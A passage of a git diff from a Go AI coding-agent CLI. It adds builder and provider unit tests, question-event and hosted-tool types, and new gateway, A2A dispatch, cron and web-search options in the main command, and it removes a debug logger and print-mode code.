+
+	percent := float64(50000) / float64(128000) * 100
+	usage.Percent = &percent
+
+	if usage.Percent == nil {
+		t.Error("expected Percent to be set")
+	}
+}
+
+// ============ builder.go tests ============
+
+func TestNewBuilder(t *testing.T) {
+	b := NewBuilder()
+
+	if b.mode != "agent" {
+		t.Errorf("expected mode 'agent', got %q", b.mode)
+	}
+	if b.thinkingLevel != ThinkingMedium {
+		t.Errorf("expected thinking level medium, got %v", b.thinkingLevel)
+	}
+	if b.maxTokens != 16384 {
+		t.Errorf("expected maxTokens 16384, got %d", b.maxTokens)
+	}
+	if b.maxIterations != 200 {
+		t.Errorf("expected maxIterations 200, got %d", b.maxIterations)
+	}
+	if b.toolExecutionMode != "parallel" {
+		t.Errorf("expected toolExecutionMode 'parallel', got %q", b.toolExecutionMode)
+	}
+	if !b.compactionEnabled {
+		t.Error("expected compactionEnabled to be true")
+	}
+	if b.compactionReserve != 16384 {
+		t.Errorf("expected compactionReserve 16384, got %d", b.compactionReserve)
+	}
+}
+
+func TestBuilderWithProvider(t *testing.T) {
+	b := NewBuilder()
+	provider := NewMockProvider("test", []ModelInfo{{ID: "gpt-4"}})
+
+	result := b.WithProvider(provider)
+
+	if result.provider != provider {
+		t.Error("provider not set correctly")
+	}
+	if result != b {
+		t.Error("WithProvider should return the same builder")
+	}
+}
+
+func TestBuilderWithModel(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithModel("gpt-4o")
+
+	if b.modelID != "gpt-4o" {
+		t.Errorf("expected modelID 'gpt-4o', got %q", b.modelID)
+	}
+	if result != b {
+		t.Error("WithModel should return the same builder")
+	}
+}
+
+func TestBuilderWithMode(t *testing.T) {
+	b := NewBuilder()
+	b.WithMode("plan")
+	if b.mode != "plan" {
+		t.Errorf("expected mode 'plan', got %q", b.mode)
+	}
+
+	b.WithMode("yolo")
+	if b.mode != "yolo" {
+		t.Errorf("expected mode 'yolo', got %q", b.mode)
+	}
+}
+
+func TestBuilderWithWorkDir(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithWorkDir("/tmp/project")
+
+	if b.workDir != "/tmp/project" {
+		t.Errorf("expected workDir '/tmp/project', got %q", b.workDir)
+	}
+	if result != b {
+		t.Error("WithWorkDir should return the same builder")
+	}
+}
+
+func TestBuilderWithThinkingLevel(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithThinkingLevel(ThinkingHigh)
+
+	if b.thinkingLevel != ThinkingHigh {
+		t.Errorf("expected thinkingLevel high, got %v", b.thinkingLevel)
+	}
+	if result != b {
+		t.Error("WithThinkingLevel should return the same builder")
+	}
+}
+
+func TestBuilderThinkingLevelConstants(t *testing.T) {
+	if ThinkingOff != "off" {
+		t.Errorf("expected off, got %q", ThinkingOff)
+	}
+	if ThinkingMinimal != "minimal" {
+		t.Errorf("expected minimal, got %q", ThinkingMinimal)
+	}
+	if ThinkingLow != "low" {
+		t.Errorf("expected low, got %q", ThinkingLow)
+	}
+	if ThinkingMedium != "medium" {
+		t.Errorf("expected medium, got %q", ThinkingMedium)
+	}
+	if ThinkingHigh != "high" {
+		t.Errorf("expected high, got %q", ThinkingHigh)
+	}
+	if ThinkingXHigh != "xhigh" {
+		t.Errorf("expected xhigh, got %q", ThinkingXHigh)
+	}
+}
+
+func TestBuilderWithMaxTokens(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithMaxTokens(8192)
+
+	if b.maxTokens != 8192 {
+		t.Errorf("expected maxTokens 8192, got %d", b.maxTokens)
+	}
+	if result != b {
+		t.Error("WithMaxTokens should return the same builder")
+	}
+}
+
+func TestBuilderWithSystemPromptExtra(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithSystemPromptExtra("extra context")
+
+	if b.systemPromptExtra != "extra context" {
+		t.Errorf("expected systemPromptExtra, got %q", b.systemPromptExtra)
+	}
+	if result != b {
+		t.Error("WithSystemPromptExtra should return the same builder")
+	}
+}
+
+func TestBuilderWithMaxIterations(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithMaxIterations(100)
+
+	if b.maxIterations != 100 {
+		t.Errorf("expected maxIterations 100, got %d", b.maxIterations)
+	}
+	if result != b {
+		t.Error("WithMaxIterations should return the same builder")
+	}
+}
+
+func TestBuilderWithToolExecutionMode(t *testing.T) {
+	b := NewBuilder()
+	b.WithToolExecutionMode("sequential")
+	if b.toolExecutionMode != "sequential" {
+		t.Errorf("expected sequential, got %q", b.toolExecutionMode)
+	}
+
+	b.WithToolExecutionMode("parallel")
+	if b.toolExecutionMode != "parallel" {
+		t.Errorf("expected parallel, got %q", b.toolExecutionMode)
+	}
+}
+
+func TestBuilderWithTools(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithTools([]string{"read", "write", "edit"})
+
+	if len(b.tools) != 3 {
+		t.Errorf("expected 3 tools, got %d", len(b.tools))
+	}
+	if b.tools[0] != "read" {
+		t.Errorf("expected first tool 'read', got %q", b.tools[0])
+	}
+	if result != b {
+		t.Error("WithTools should return the same builder")
+	}
+}
+
+func TestBuilderWithSandbox(t *testing.T) {
+	b := NewBuilder()
+
+	b.WithSandbox(true)
+	if !b.sandboxEnabled {
+		t.Error("expected sandboxEnabled to be true")
+	}
+
+	b.WithSandbox(false)
+	if b.sandboxEnabled {
+		t.Error("expected sandboxEnabled to be false")
+	}
+}
+
+func TestBuilderWithSessionDir(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithSessionDir("/tmp/sessions")
+
+	if b.sessionDir != "/tmp/sessions" {
+		t.Errorf("expected sessionDir '/tmp/sessions', got %q", b.sessionDir)
+	}
+	if result != b {
+		t.Error("WithSessionDir should return the same builder")
+	}
+}
+
+func TestBuilderWithCompaction(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithCompaction(false, 8192)
+
+	if b.compactionEnabled {
+		t.Error("expected compactionEnabled to be false")
+	}
+	if b.compactionReserve != 8192 {
+		t.Errorf("expected compactionReserve 8192, got %d", b.compactionReserve)
+	}
+	if result != b {
+		t.Error("WithCompaction should return the same builder")
+	}
+}
+
+func TestBuilderWithMultiAgent(t *testing.T) {
+	b := NewBuilder()
+
+	b.WithMultiAgent(true)
+	if !b.multiAgent {
+		t.Error("expected multiAgent to be true")
+	}
+
+	b.WithMultiAgent(false)
+	if b.multiAgent {
+		t.Error("expected multiAgent to be false")
+	}
+}
+
+func TestBuilderWithApprovalHandler(t *testing.T) {
+	b := NewBuilder()
+	handler := func(toolCallID, toolName string, args map[string]any) bool {
+		return true
+	}
+
+	result := b.WithApprovalHandler(handler)
+
+	if b.approvalHandler == nil {
+		t.Error("expected approvalHandler to be set")
+	}
+
+	b.WithApprovalHandler(nil)
+	if b.approvalHandler != nil {
+		t.Error("expected approvalHandler to be nil")
+	}
+
+	_ = result
+}
+
+func TestBuilderConfig(t *testing.T) {
+	provider := NewMockProvider("test", []ModelInfo{{ID: "gpt-4"}})
+	b := NewBuilder().
+		WithProvider(provider).
+		WithModel("gpt-4").
+		WithMode("yolo").
+		WithWorkDir("/home/user/project").
+			WithThinkingLevel(ThinkingHigh).
+		WithMaxTokens(8192).
+		WithSystemPromptExtra("extra").
+		WithMaxIterations(100).
+		WithToolExecutionMode("sequential").
+		WithTools([]string{"read"}).
+		WithSandbox(true).
+		WithSessionDir("/tmp/sessions").
+		WithCompaction(false, 8192).
+		WithMultiAgent(true)
+
+	cfg := b.Config()
+
+	if cfg.Provider != provider {
+		t.Error("Provider not matched")
+	}
+	if cfg.ModelID != "gpt-4" {
+		t.Errorf("expected ModelID 'gpt-4', got %q", cfg.ModelID)
+	}
+	if cfg.Mode != "yolo" {
+		t.Errorf("expected Mode 'yolo', got %q", cfg.Mode)
+	}
+	if cfg.WorkDir != "/home/user/project" {
+		t.Errorf("expected WorkDir, got %q", cfg.WorkDir)
+	}
+	if cfg.ThinkingLevel != ThinkingHigh {
+		t.Errorf("expected ThinkingLevel high, got %v", cfg.ThinkingLevel)
+	}
+	if cfg.MaxTokens != 8192 {
+		t.Errorf("expected MaxTokens 8192, got %d", cfg.MaxTokens)
+	}
+	if cfg.SystemPromptExtra != "extra" {
+		t.Errorf("expected SystemPromptExtra, got %q", cfg.SystemPromptExtra)
+	}
+	if cfg.MaxIterations != 100 {
+		t.Errorf("expected MaxIterations 100, got %d", cfg.MaxIterations)
+	}
+	if cfg.ToolExecutionMode != "sequential" {
+		t.Errorf("expected ToolExecutionMode, got %q", cfg.ToolExecutionMode)
+	}
+	if len(cfg.Tools) != 1 || cfg.Tools[0] != "read" {
+		t.Error("Tools not matched")
+	}
+	if !cfg.SandboxEnabled {
+		t.Error("expected SandboxEnabled true")
+	}
+	if cfg.SessionDir != "/tmp/sessions" {
+		t.Errorf("expected SessionDir, got %q", cfg.SessionDir)
+	}
+	if cfg.CompactionEnabled {
+		t.Error("expected CompactionEnabled false")
+	}
+	if cfg.CompactionReserve != 8192 {
+		t.Errorf("expected CompactionReserve 8192, got %d", cfg.CompactionReserve)
+	}
+	if !cfg.MultiAgent {
+		t.Error("expected MultiAgent true")
+	}
+}
+
+func TestBuilderBuildRequiresProvider(t *testing.T) {
+	b := NewBuilder()
+	_, err := b.Build()
+
+	if err == nil {
+		t.Error("expected error when provider is nil")
+	}
+}
+
+func TestBuilderBuildRequiresModel(t *testing.T) {
+	provider := NewMockProvider("test", []ModelInfo{})
+	b := NewBuilder().WithProvider(provider)
+
+	_, err := b.Build()
+
+	if err == nil {
+		t.Error("expected error when no models available")
+	}
+}
+
+// ============ provider.go tests ============
+
+func TestBaseProviderName(t *testing.T) {
+	provider := NewBaseProvider("openai", []ModelInfo{{ID: "gpt-4"}})
+	if provider.Name() != "openai" {
+		t.Errorf("expected 'openai', got %q", provider.Name())
+	}
+}
+
+func TestBaseProviderModels(t *testing.T) {
+	models := []ModelInfo{
+		{ID: "gpt-4"},
+		{ID: "gpt-3.5-turbo"},
+	}
+	provider := NewBaseProvider("openai", models)
+
+	result := provider.Models()
+	if len(result) != 2 {
+		t.Errorf("expected 2 models, got %d", len(result))
+	}
+}
+
+func TestBaseProviderGetModel(t *testing.T) {
+	models := []ModelInfo{
+		{ID: "gpt-4", Name: "GPT-4"},
+		{ID: "gpt-3.5-turbo", Name: "GPT-3.5"},
+	}
+	provider := NewBaseProvider("openai", models)
+
+	model := provider.GetModel("gpt-4")
+	if model == nil {
+		t.Error("expected to find gpt-4")
+	}
+	if model.Name != "GPT-4" {
+		t.Errorf("expected name 'GPT-4', got %q", model.Name)
+	}
+
+	model = provider.GetModel("gpt-5")
+	if model != nil {
+		t.Error("expected nil for non-existing model")
+	}
+}
+
+func TestBoolPtr(t *testing.T) {
+	truePtr := BoolPtr(true)
+	if truePtr == nil || !*truePtr {
+		t.Error("expected true")
+	}
+
+	falsePtr := BoolPtr(false)
+	if falsePtr == nil || *falsePtr {
+		t.Error("expected false")
+	}
+}
+
+func TestVendorFromBaseURL(t *testing.T) {
+	tests := []struct {
+		url      string
+		expected string
+	}{
+		{"api.deepseek.com", "deepseek"},
+		{"https://api.deepseek.com/v1", "deepseek"},
+		{"api.xiaomimimo.com", "xiaomi"},
+		{"api.moonshot.cn", "kimi"},
+		{"api.minimax.chat", "minimax"},
+		{"ark.cn-beijing.volces.com", "seed"},
+		{"aip.baidubce.com", "qianfan"},
+		{"dashscope.aliyuncs.com", "bailian"},
+		{"ai.gitee.com", "gitee"},
+		{"openrouter.ai", "openrouter"},
+		{"api.together.xyz", "together"},
+		{"api.groq.com", "groq"},
+		{"api.fireworks.ai", "fireworks"},
+		{"unknown.api.com", ""},
+		{"", ""},
+	}
+
+	for _, tt := range tests {
+		result := VendorFromBaseURL(tt.url)
+		if result != tt.expected {
+			t.Errorf("for %q: expected %q, got %q", tt.url, tt.expected, result)
+		}
+	}
+}
+
+func TestThinkingLevelValues(t *testing.T) {
+	if string(ThinkingOff) != "off" {
+		t.Errorf("expected off, got %q", ThinkingOff)
+	}
+	if string(ThinkingMinimal) != "minimal" {
+		t.Errorf("expected minimal, got %q", ThinkingMinimal)
+	}
+	if string(ThinkingLow) != "low" {
+		t.Errorf("expected low, got %q", ThinkingLow)
+	}
+	if string(ThinkingMedium) != "medium" {
+		t.Errorf("expected medium, got %q", ThinkingMedium)
+	}
+	if string(ThinkingHigh) != "high" {
+		t.Errorf("expected high, got %q", ThinkingHigh)
+	}
+	if string(ThinkingXHigh) != "xhigh" {
+		t.Errorf("expected xhigh, got %q", ThinkingXHigh)
+	}
+}
+
+func TestStreamEventTypeValues(t *testing.T) {
+	if StreamStart != 0 {
+		t.Errorf("StreamStart should be 0, got %d", StreamStart)
+	}
+	if StreamTextDelta != 1 {
+		t.Errorf("StreamTextDelta should be 1, got %d", StreamTextDelta)
+	}
+	if StreamThinkDelta != 2 {
+		t.Errorf("StreamThinkDelta should be 2, got %d", StreamThinkDelta)
+	}
+	if StreamToolCall != 3 {
+		t.Errorf("StreamToolCall should be 3, got %d", StreamToolCall)
+	}
+	if StreamUsage != 4 {
+		t.Errorf("StreamUsage should be 4, got %d", StreamUsage)
+	}
+	if StreamDone != 5 {
+		t.Errorf("StreamDone should be 5, got %d", StreamDone)
+	}
+	if StreamError != 6 {
+		t.Errorf("StreamError should be 6, got %d", StreamError)
+	}
+}
+
+func TestModelInfo(t *testing.T) {
+	compat := &ModelCompat{
+		ThinkingFormat: "deepseek",
+	}
+
+	model := ModelInfo{
+		ID:            "deepseek-chat",
+		Name:          "DeepSeek Chat",
+		Provider:      "deepseek",
+		Reasoning:     true,
+		ContextWindow: 64000,
+		MaxTokens:     8192,
+		Compat:        compat,
+	}
+
+	if model.ID != "deepseek-chat" {
+		t.Errorf("expected ID, got %q", model.ID)
+	}
+	if model.Compat == nil {
+		t.Error("expected Compat to be set")
+	}
+	if model.Compat.ThinkingFormat != "deepseek" {
+		t.Errorf("expected thinking format, got %q", model.Compat.ThinkingFormat)
+	}
+}
+
+func TestModelCompatBoolPtrs(t *testing.T) {
+	trueVal := true
+	falseVal := false
+
+	compat := &ModelCompat{
+		SupportsDeveloperRole:   &trueVal,
+		SupportsStore:           &falseVal,
+		SupportsReasoningEffort: nil,
+	}
+
+	if compat.SupportsDeveloperRole == nil || !*compat.SupportsDeveloperRole {
+		t.Error("expected SupportsDeveloperRole to be true")
+	}
+	if compat.SupportsStore == nil || *compat.SupportsStore {
+		t.Error("expected SupportsStore to be false")
+	}
+}
+
+func diff(a, b float64) float64 {
+	if a > b {
+		return a - b
+	}
+	return b - a
+}
diff --git a/agent/types.go b/agent/types.go
index 74d9c88..17aa3f6 100644
--- a/agent/types.go
+++ b/agent/types.go
@@ -49,6 +49,13 @@ type Agent interface {
 	HandleApprovalResponse(approvalID string, approved bool)
 }
 
+// QuestionHandler is an optional extension of Agent that supports interactive questions.
+// Only implemented by agents in TUI plan mode. Use type assertion to check support.
+type QuestionHandler interface {
+	Agent
+	HandleQuestionResponse(questionID string, answer string)
+}
+
 // AgentConfigView is a read-only view of agent configuration for external inspection.
 type AgentConfigView struct {
 	ID       AgentID
@@ -75,27 +82,27 @@ type AgentContext struct {
 type Role string
 
 const (
-	RoleUser        Role = "user"
-	RoleAssistant   Role = "assistant"
-	RoleToolResult  Role = "toolResult"
-	RoleSystem      Role = "system"
+	RoleUser       Role = "user"
+	RoleAssistant  Role = "assistant"
+	RoleToolResult Role = "toolResult"
+	RoleSystem     Role = "system"
 )
 
 // Message represents a single message in the conversation.
 type Message struct {
-	Role            Role
-	Content         string
-	Contents        []ContentBlock
-	IsError         bool
+	Role           Role
+	Content        string
+	Contents       []ContentBlock
+	IsError        bool
 	SystemInjected bool
-	ToolCallID      string
-	ToolName        string
-	Usage           *Usage
+	ToolCallID     string
+	ToolName       string
+	Usage          *Usage
 }
 
 // ContentBlock represents a typed block within a message.
 type ContentBlock struct {
-	Type         string        // "text", "toolCall", "thinking", "image"
+	Type         string // "text", "toolCall", "thinking", "image"
 	Text         string
 	ToolCall     *ToolCallBlock
 	Thinking     string
@@ -124,9 +131,13 @@ type CacheControl struct {
 
 // ToolDefinition describes a tool available to the LLM.
 type ToolDefinition struct {
-	Name        string
-	Description string
-	Parameters  []byte // JSON Schema
+	Name         string
+	Description  string
+	Parameters   []byte // JSON Schema
+	Kind         string // "function" (default) or "hosted"
+	Provider     string
+	ProviderType string
+	Model        string
 }
 
 // Usage tracks token consumption for a single LLM response.
@@ -186,6 +197,8 @@ const (
 	EventToolResult
 	EventToolApprovalRequest  // Request user approval for tool execution
 	EventToolApprovalResponse // User response to approval request
+	EventQuestionRequest      // Ask user a multiple-choice question
+	EventQuestionResponse     // User response to question
 	EventPlanUpdate           // Structured task plan update
 
 	// Status events
@@ -237,6 +250,13 @@ type Event struct {
 	ApprovalArgs   map[string]any
 	ApprovalResult bool
 
+	// Question events
+	QuestionID      string
+	QuestionText    string
+	QuestionOptions []string
+	QuestionContext string
+	QuestionAnswer  string
+
 	// Status
 	StatusMessage string
 
diff --git a/cmd/vibecoding/main.go b/cmd/vibecoding/main.go
index 859cb92..c43b850 100644
--- a/cmd/vibecoding/main.go
+++ b/cmd/vibecoding/main.go
@@ -3,26 +3,24 @@ package main
 import (
 	"context"
 	"fmt"
-	"io"
 	"os"
 	"path/filepath"
 	"strings"
 	"time"
 
-	"golang.org/x/term"
-
 	tea "github.com/charmbracelet/bubbletea"
-	"github.com/charmbracelet/glamour"
 	"github.com/spf13/cobra"
 
+	"github.com/startvibecoding/vibecoding/internal/a2a"
 	"github.com/startvibecoding/vibecoding/internal/acp"
 	"github.com/startvibecoding/vibecoding/internal/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
 	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/gateway"
 	"github.com/startvibecoding/vibecoding/internal/mcp"
 	"github.com/startvibecoding/vibecoding/internal/provider"
-	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
 	"github.com/startvibecoding/vibecoding/internal/sandbox"
 	"github.com/startvibecoding/vibecoding/internal/session"
 	"github.com/startvibecoding/vibecoding/internal/skills"
@@ -31,14 +29,6 @@ import (
 )
 
 var version = "dev"
-var debugEnabled bool
-
-// debugLog prints debug messages to stderr if debug mode is enabled.
-func debugLog(format string, args ...interface{}) {
-	if debugEnabled {
-		fmt.Fprintf(os.Stderr, "[DEBUG] "+format+"\n", args...)
-	}
-}
 
 func main() {
 	rootCmd := newRootCommand(run, acp.Run)
@@ -49,18 +39,23 @@ func main() {
 
 func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.RunOptions) error) *cobra.Command {
 	var (
-		flagProvider   string
-		flagModel      string
-		flagMode       string
-		flagThinking   string
-		flagContinue   bool
-		flagResume     string
-		flagSession    string
-		flagSandbox    bool
-		flagPrint      bool
-		flagVerbose    bool
-		flagDebug      bool
-		flagMultiAgent bool
+		flagProvider        string
+		flagModel           string
+		flagMode            string
+		flagThinking        string
+		flagContinue        bool
+		flagResume          string
+		flagSession         string
+		flagSandbox         bool
+		flagPrint           bool
+		flagVerbose         bool
+		flagDebug           bool
+		flagMultiAgent      bool
+		flagWebSearch       bool
+		flagInitGateway     bool
+		flagForce           bool
+		flagEnableA2AMaster bool
+		flagInitA2AMaster   bool
 	)
 
 	rootCmd := &cobra.Command{
@@ -71,19 +66,37 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 		Version: version,
 		Args:    cobra.ArbitraryArgs,
 		RunE: func(cmd *cobra.Command, args []string) error {
+			if flagInitA2AMaster {
+				path, err := a2a.InitA2AMasterConfig(flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created a2a master config: %s\n", path)
+				return nil
+			}
+			if flagInitGateway {
+				path, err := gateway.InitGatewayConfig(flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created gateway config: %s\n", path)
+				return nil
+			}
 			return runFn(args, runOptions{
-				provider:   flagProvider,
-				model:      flagModel,
-				mode:       flagMode,
-				thinking:   flagThinking,
-				continue_:  flagContinue,
-				resume:     flagResume,
-				session:    flagSession,
-				sandbox:    flagSandbox,
-				print:      flagPrint,
-				verbose:    flagVerbose,
-				debug:      flagDebug,
-				multiAgent: flagMultiAgent,
+				provider:        flagProvider,
+				model:           flagModel,
+				mode:            flagMode,
+				thinking:        flagThinking,
+				continue_:       flagContinue,
+				resume:          flagResume,
+				session:         flagSession,
+				sandbox:         flagSandbox,
+				print:           flagPrint,
+				verbose:         flagVerbose,
+				debug:           flagDebug,
+				multiAgent:      flagMultiAgent,
+				webSearch:       flagWebSearch,
+				enableA2AMaster: flagEnableA2AMaster,
 			})
 		},
 	}
@@ -102,6 +115,7 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 				Verbose:    flagVerbose,
 				Debug:      flagDebug,
 				MultiAgent: flagMultiAgent,
+				WebSearch:  flagWebSearch,
 			})
 		},
 	}
@@ -119,6 +133,11 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 	flags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
 	flags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
 	flags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	flags.BoolVar(&flagWebSearch, "web-search", false, "Enable configured web search provider for this run")
+	flags.BoolVar(&flagInitGateway, "init-gateway", false, "Create gateway.json config template")
+	flags.BoolVar(&flagForce, "force", false, "Force overwrite existing files (used with --init-*)")
+	flags.BoolVar(&flagEnableA2AMaster, "enable-a2a-master", false, "Enable A2A master mode (dispatch tasks to remote agents)")
+	flags.BoolVar(&flagInitA2AMaster, "init-a2a-master-config", false, "Create a2a-list.json config template")
 
 	acpFlags := acpCmd.Flags()
 	acpFlags.StringVarP(&flagProvider, "provider", "p", "", "Provider (openai, anthropic, or custom provider name)")
@@ -129,24 +148,66 @@ func newRootCommand(runFn func([]string, runOptions) error, acpRunFn func(acp.Ru
 	acpFlags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
 	acpFlags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
 	acpFlags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	acpFlags.BoolVar(&flagWebSearch, "web-search", false, "Enable configured web search provider for this ACP run")
+
+	var (
+		flagGatewayPort    string
+		flagGatewayConfig  string
+		flagGatewayWorkDir string
+	)
+
+	gatewayCmd := &cobra.Command{
+		Use:   "gateway",
+		Short: "Run the OpenAI-compatible HTTP gateway",
+		Long:  "Start VibeCoding as an HTTP server exposing a standard OpenAI Chat Completions API.",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return gateway.Run(gateway.RunOptions{
+				ConfigPath: flagGatewayConfig,
+				Port:       flagGatewayPort,
+				Provider:   flagProvider,
+				Model:      flagModel,
+				WorkDir:    flagGatewayWorkDir,
+				Sandbox:    flagSandbox,
+				MultiAgent: flagMultiAgent,
+				Verbose:    flagVerbose,
+				Debug:      flagDebug,
+			}, version)
+		},
+	}
+
+	gatewayFlags := gatewayCmd.Flags()
+	gatewayFlags.StringVar(&flagGatewayPort, "port", "", "Listen port (default: from gateway.json or 8080)")
+	gatewayFlags.StringVar(&flagGatewayConfig, "config", "", "Path to gateway.json")
+	gatewayFlags.StringVar(&flagGatewayWorkDir, "work-dir", "", "Default working directory")
+	gatewayFlags.StringVarP(&flagProvider, "provider", "p", "", "Provider (openai, anthropic, or custom provider name)")
+	gatewayFlags.StringVarP(&flagModel, "model", "m", "", "Model ID")
+	gatewayFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox (bwrap) for secure execution")
+	gatewayFlags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	gatewayFlags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
+	gatewayFlags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
 
 	rootCmd.AddCommand(acpCmd)
+	rootCmd.AddCommand(gatewayCmd)
+	rootCmd.AddCommand(newHermesCommand())
+	rootCmd.AddCommand(newA2ACommand())
 	return rootCmd
 }
 
 type runOptions struct {
-	provider   string
-	model      string
-	mode       string
-	thinking   string
-	continue_  bool
-	resume     string
-	session    string
-	sandbox    bool
-	print      bool
-	verbose    bool
-	debug      bool
-	multiAgent bool
+	provider        string
+	model           string
+	mode            string
+	thinking        string
+	continue_       bool
+	resume          string
+	session         string
+	sandbox         bool
+	print           bool
+	verbose         bool
+	debug           bool
+	multiAgent      bool
+	webSearch       bool
+	enableA2AMaster bool
 }
 
 func run(args []string, opts runOptions) error {
@@ -172,6 +233,9 @@ func run(args []string, opts runOptions) error {
 	if err != nil {
 		return fmt.Errorf("load settings: %w", err)
 	}
+	if opts.webSearch {
+		settings.WebSearch.Enabled = config.BoolPtr(true)
+	}
 
 	// Get working directory
 	cwd, err := os.Getwd()
@@ -317,6 +381,9 @@ func run(args []string, opts runOptions) error {
 	registry := tools.NewRegistry(cwd, sbMgr.GetActive())
 	registry.RegisterDefaultsWithPlanTool(settings.IsPlanToolEnabled())
 
+	// Register question tool for interactive plan mode (TUI only)
+	registry.Register(tools.NewQuestionTool(registry))
+
 	// Register skill reference tool if skills are available
 	if skillsMgr != nil {
 		registry.Register(tools.NewSkillRefTool(skillsMgr))
@@ -335,8 +402,28 @@ func run(args []string, opts runOptions) error {
 	// Build extra system context
 	extraContext := contextStr + skillsContext
 
+	// A2A master mode: load agent list and register dispatch tool
+	if opts.enableA2AMaster {
+		// Try project-level first, then global
+		a2aListPath := a2a.ProjectAgentListConfigPath()
+		if _, err := os.Stat(a2aListPath); err != nil {
+			a2aListPath = a2a.AgentListConfigPath()
+		}
+		a2aListCfg, err := a2a.LoadAgentList(a2aListPath)
+		if err != nil {
+			return fmt.Errorf("load a2a-list.json: %w", err)
+		}
+		a2aMgr := a2a.NewA2AManager(a2aListCfg)
+		registry.Register(tools.NewA2ADispatchTool(&a2aDispatcherAdapter{mgr: a2aMgr}))
+		if opts.verbose {
+			fmt.Fprintf(os.Stderr, "A2A master mode enabled: %d agents loaded from %s\n", len(a2aMgr.List()), a2aListPath)
+		}
+	}
+
 	// Multi-agent mode: create AgentFactory and AgentManager, register subagent tools
 	var agentMgr *agent.AgentManager
+	var cronStore cron.CronStore
+	var cronScheduler *cron.Scheduler
 	if opts.multiAgent {
 		compactionSettings := ctxpkg.CompactionSettings{
 			Enabled:          settings.Compaction.Enabled,
@@ -359,6 +446,14 @@ func run(args []string, opts runOptions) error {
 		registry.Register(agent.NewSubAgentSendTool(agentMgr))
 		registry.Register(agent.NewSubAgentDestroyTool(agentMgr))
 
+		// Create cron store, scheduler, and tool
+		cronPath := filepath.Join(config.ConfigDir(), "cron.json")
+		cronStore = cron.NewFileCronStore(cronPath)
+		cronScheduler = cron.NewScheduler(cronStore, agentMgr, 30*time.Second)
+		cronScheduler.Start()
+		registry.Register(cron.NewCronTool(cronStore, cronScheduler))
+		defer cronScheduler.Stop()
+
 		if opts.verbose {
 			fmt.Fprintf(os.Stderr, "Multi-agent mode enabled\n")
 		}
@@ -373,7 +468,7 @@ func run(args []string, opts runOptions) error {
 	// Clear any pending stdin input (e.g., terminal color queries)
 	clearStdin()
 
-	app := tui.NewApp(p, model, settings, sess, registry, sbInfo, extraContext, skillsMgr, mode, opts.multiAgent, agentMgr)
+	app := tui.NewApp(p, model, settings, sess, registry, sbInfo, extraContext, skillsMgr, mode, opts.multiAgent, agentMgr, cronStore, cronScheduler)
 	// Add context files info and session info as initial message
 	var initialMsg string
 	if contextFilesInfo != "" {
@@ -397,270 +492,20 @@ func run(args []string, opts runOptions) error {
 	return nil
 }
 
-// createProvider creates a provider from config based on provider name.
-func createProvider(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
-	return providerfactory.Create(settings, providerName, modelID)
-}
-
-// clearStdin reads and discards any pending input from stdin.
-// This is needed because some terminals send color query sequences on startup.
-func clearStdin() {
-	// Set a short read deadline so pending reads time out cleanly.
-	// Some stdin types (pipes, certain PTYs) don't support deadlines;
-	// if SetReadDeadline fails we skip clearing to avoid blocking forever.
-	if err := os.Stdin.SetReadDeadline(time.Now().Add(50 * time.Millisecond)); err != nil {
-		return
-	}
-	defer os.Stdin.SetReadDeadline(time.Time{}) // Clear deadline
-	buf := make([]byte, 128)
-	for {
-		n, err := os.Stdin.Read(buf)
-		if n == 0 || err != nil {
-			return
-		}
-	}
-}
-
-func runPrint(args []string, p provider.Provider, model *provider.Model, mode string, thinkingLevel provider.ThinkingLevel, settings *config.Settings, registry *tools.Registry, sess *session.Manager, extraContext string, multiAgent bool, agentMgr *agent.AgentManager) error {
-	input := strings.Join(args, " ")
-	if input == "" {
-		data, err := io.ReadAll(os.Stdin)
-		if err != nil {
-			return fmt.Errorf("no input provided")
-		}
-		input = string(data)
-	}
-
-	fmt.Fprintf(os.Stderr, "Using %s/%s in %s mode\n", p.Name(), model.ID, mode)
-
-	// Create glamour renderer for markdown
-	wordWrap := 80
-	if w, _, err := term.GetSize(int(os.Stdout.Fd())); err == nil && w > 0 {
-		wordWrap = w
-	}
-	renderer, err := glamour.NewTermRenderer(
-		glamour.WithStandardStyle("dark"),
-		glamour.WithWordWrap(wordWrap),
-	)
-	if err != nil {
-		debugLog("Failed to create glamour renderer: %v", err)
-		renderer = nil
-	}
-
-	compactionSettings := ctxpkg.CompactionSettings{
-		Enabled:          settings.Compaction.Enabled,
-		ReserveTokens:    settings.Compaction.ReserveTokens,
-		KeepRecentTokens: settings.Compaction.KeepRecentTokens,
-	}
-	if compactionSettings.ReserveTokens == 0 {
-		compactionSettings.ReserveTokens = 16384
-	}
